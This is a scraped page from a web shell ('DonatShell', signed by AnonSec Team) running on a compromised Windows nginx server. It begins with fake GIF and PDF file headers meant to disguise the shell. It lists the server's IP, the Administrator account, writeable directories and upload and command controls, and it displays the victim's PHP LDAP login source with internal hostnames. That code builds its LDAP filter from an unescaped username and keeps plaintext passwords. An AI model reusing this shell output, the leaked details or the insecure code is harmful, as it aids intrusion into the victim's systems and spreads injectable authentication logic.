GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/User/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/User/AuthenticateUser_via_LDAP.phpinc
<?
// User/AuthenticateUser_via_LDAP.phpinc
// Called by User/AuthenticateUser.phpinc:18
t_Begin(d_O());

if (d_O()) { $DEBUG_AuthenticateUser_via_LDAP = 'd'; }
#$DEBUG_AuthenticateUser_via_LDAP = 'd';
#d_Var("\$_SERVER['REMOTE_ADDR']",$_SERVER['REMOTE_ADDR']);
#if ( $_SERVER['REMOTE_ADDR'] == '134.29.173.111' ) { $DEBUG_AuthenticateUser_via_LDAP = 'd'; }
if (!isset($DEBUG_AuthenticateUser_via_LDAP)) { $DEBUG_AuthenticateUser_via_LDAP = false; }

#$DEBUG_GetAllAttributes = true;
if ( isset($_GET['all']) ) $DEBUG_GetAllAttributes = true;
if ( !isset($DEBUG_GetAllAttributes) ) $DEBUG_GetAllAttributes = false;

if ($DEBUG_AuthenticateUser_via_LDAP) {
	ini_set('display_errors',true);
	error_reporting(E_ALL | E_STRICT);
	echo "<b>".basename(__FILE__).":".__LINE__."</b> ";
	echo __FILE__." on ".$_SERVER['HTTP_HOST']."<br>\n";
}

t_Begin();

#d_V(false,$DEBUG_AuthenticateUser_via_LDAP.'');

ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$skipAuthentication = true;
#include('application.phpinc');
#require('common/functions.phpinc');

// User ldaps (ssl).
if ( isset($_GET['ssl']) ) { $USE_SSL = true; }
$USE_SSL = true; // ldaps is currently needed for 

// Preset variables:
$attributesToReturn=array("givenname","middlename","sn","mail","distinguishedname","department","company"); 	// List of attributes to return.
if ( !$DEBUG_GetAllAttributes ) { $attribute=$attributesToReturn; } else { $attribute=array("*"); }
$attribute=$attributesToReturn;
// DNS hostname or IP of your server.
$LDAPserver = "floyd.ridgewater.local";
$dclist = gethostbyname($LDAPserver);

if ($DEBUG_AuthenticateUser_via_LDAP) {
	d_Var('$dclist',$dclist,$DEBUG_AuthenticateUser_via_LDAP.'');
}

$USE_SSL = true;
if ($USE_SSL) {
	$LDAPprotocol = "ldaps://";
	$LDAPport = 636;
	#$LDAPport = 389;
} else {
	$LDAPprotocol = "ldap://";
	$LDAPport = 389;
}
if ($DEBUG_AuthenticateUser_via_LDAP) {
	d_Var('$LDAPprotocol',$LDAPprotocol);
	d_Var('$LDAPserver',$LDAPserver);
	d_Var('$LDAPport',$LDAPport);
}

$DC1 = "ridgewater";
$DC2 = "local";

// setup other variables.
$search_user = $f['username'];
$ldap_domain = $DC1.".".$DC2;
$base_dn = "DC=".$DC1.", DC=".$DC2;

putenv("LDAPCONF=C:\openldap\sysconf\ldap.conf");

$connect = ldap_connect($LDAPprotocol.$LDAPserver.':'.$LDAPport); // Kind of meaningless as it always works. The server and port are meaningless except in creating the link for ldap_bind.
if ($DEBUG_AuthenticateUser_via_LDAP) {
	echo 'ldap_connect('.$LDAPprotocol.$LDAPserver.':'.$LDAPport.');'."<br>\n";
	echo "\$connect=$connect",' ',basename(__FILE__),':',__LINE__,"<br>\n";;
}

// Set ldap options.
ldap_set_option($connect, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($connect, LDAP_OPT_REFERRALS, 0);
//ldap_set_option($connect, LDAP_OPT_X_TLS_REQUIRE_CERT, 0);

if ($DEBUG_AuthenticateUser_via_LDAP) {
	echo "<br><b>\$sr = ldap_bind($connect,".$f['username']."@$ldap_domain,'********');</b>",' ',basename(__FILE__),':',__LINE__,"<br>\n";
}
ldap_get_option($connect, 0x0032, $extended_error);
if ( !$f['password'] ) { $f['password'] = 'nopassword'; }
$sr = @ldap_bind($connect, $f['username']."@".$ldap_domain, $f['password']); // $f['username']."@".$ldap_domain
d_Var('$connect',$connect,$DEBUG_AuthenticateUser_via_LDAP.'');
d_Var('$sr',$sr,$DEBUG_AuthenticateUser_via_LDAP.'');

if ($sr) {
	// Search susername entry.
	$filter = "(&(objectClass=user)(objectCategory=person)(cn=".$search_user."))";
	d_Var('$base_dn',$base_dn,$DEBUG_AuthenticateUser_via_LDAP.'');
	d_Var('$filter',$filter,$DEBUG_AuthenticateUser_via_LDAP.'');
	d_Var('$attribute',$attribute,$DEBUG_AuthenticateUser_via_LDAP.'');
	$sr = ldap_search($connect, $base_dn, $filter, $attribute);
	d_Var('$sr',$sr,$DEBUG_AuthenticateUser_via_LDAP.'');
	$info = ldap_get_entries($connect, $sr);
	#d_Var('$info',$info,$DEBUG_AuthenticateUser_via_LDAP.'');
	ldap_close($connect);
	d_Var('$info',$info,$DEBUG_AuthenticateUser_via_LDAP.'');
	/**/
	$loginAuthenticated = true;
	$authenticatedBy = 'ldap';
	$userRow = array();
	$userRow['userUsername'] = $f['username'];
	$userRow['userPassword'] = $f['password'];
	$userRow['userFirstname'] = $info[0]['givenname'][0];
	$userRow['userMiddlename'] = $info[0]['middlename'][0];
	$userRow['userLastname'] = $info[0]['sn'][0];
	$userRow['userEmailAddress'] = $info[0]['mail'][0];
	$userRow['department'] = array();
	for ( $i=0; $i<$info[0]['department']['count']; $i++ ) {
		$userRow['department'][] = $info[0]['department'][$i];
	}
	$userRow['company'] = array();
	for ( $i=0; $i<$info[0]['company']['count']; $i++ ) {
		$userRow['company'][] = $info[0]['company'][$i];
	}
} else {
	d_Line('sr failed.','e');
}

t_End();
/** /
if ($DEBUG_AuthenticateUser_via_LDAP) {
	d_On(); include('common/pageFooter.phpinc');
	#exit;
}
/**/
?>

Anon7 - 2022
AnonSec Team